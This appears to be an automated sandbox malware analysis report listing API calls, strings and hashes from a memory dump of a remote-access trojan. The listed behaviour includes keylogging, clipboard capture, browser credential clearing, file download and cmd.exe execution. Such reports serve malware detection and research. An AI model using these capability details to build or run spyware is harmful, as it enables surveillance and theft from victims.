                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32 ref: 00413888
                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 3446828153-604454484
                                                  • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 39102293-0
                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                  • API String ID: 1881088180-3686566968
                                                  • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                  • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                  • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$hYG
                                                  • API String ID: 1174141254-2782910960
                                                  • Opcode ID: a14b1eb8d802363331a753cbf212e5489769790bc52ddd698e1c7ac902353e26
                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                  • Opcode Fuzzy Hash: a14b1eb8d802363331a753cbf212e5489769790bc52ddd698e1c7ac902353e26
                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
